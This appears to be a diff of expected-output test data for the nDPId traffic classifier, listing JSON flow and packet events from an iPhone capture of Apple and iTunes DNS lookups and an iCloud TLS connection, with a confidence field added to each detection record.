 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABB1EAAAP8RYgjAqAIRwKgCAdBFADUALQ1OiY4BAAABAAAAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAQ=="}
-00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7QA4AAP8R9kDAqAIRwKgCAfQ+ADUAJzA9jewBAAABAAAAAAAAA2NsNAVhcHBsZQNjb20AAAEAAQ=="}
-00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCtyIAAP8RfyXAqAIRwKgCAfeRADUALilRj7EBAAABAAAAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAE="}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD8ooAAP8RQ7zAqAIRwKgCAdAYADUALxueCAsBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCQ9gAAP8R8m\/AqAIRwKgCAdLfADUALndaZloBAAABAAAAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAE="}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD04UAAP8RYsHAqAIRwKgCAcLYADUAL8OecEkBAAABAAAAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00645{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454598755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1582454598755,"pkt":"xGGLNYKpxiwDYGpkCABFAAC9YWUAAEARk2jAqAIBwKgCEQA1zcoAqUkOwemBgAABAAQAAAAAA3d3dwZpY2xvdWQDY29tAAABAAHADAAFAAEAAAfiAB8Hd3d3LWNkbgZpY2xvdWQDY29tBmFrYWRucwNuZXQAwCwABQABAAAAjwAZA3d3dwZpY2xvdWQDY29tB2VkZ2VrZXnARsBXAAUAAQAAEZYAFQVlNDQ3OAFhCmFrYW1haWVkZ2XARsB8AAEAAQAAABgABBctSi4="}
-00754{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}}
+00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}}
 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAADSfP0AAEARd7vAqAIBwKgCEQA10EUAvrFqiY6BgAABAAQAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAcAMAAUAAQAACaQAJwlpcGhvbmUtbGQMb3JpZ2luLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAxAAUAAQAAAMcAIQxpcGhvbmUtbGQtYXIFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAFQVlOTMzOAFkCmFrYW1haWVkZ2XAU8CRAAEAAQAAAA8ABFx6\/FI="}
-00750{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.252.82"}}
+00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.252.82"}}
 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAAB5PvQAAEARth3AqAIBwKgCEQA1+ssAZUgsu2OBgAABAAAAAQAACmJhc2VqdW1wZXIFYXBwbGUDY29tAAABAAHAFwAGAAEAAADfACsHbnNlcnZlcsAXCmhvc3RtYXN0ZXLAF3fP6nAAAAOEAAADhAAewwAAADhA"}
-00743{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyEMAAEARLHjAqAIBwKgCEQA195EAu7eFj7GBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
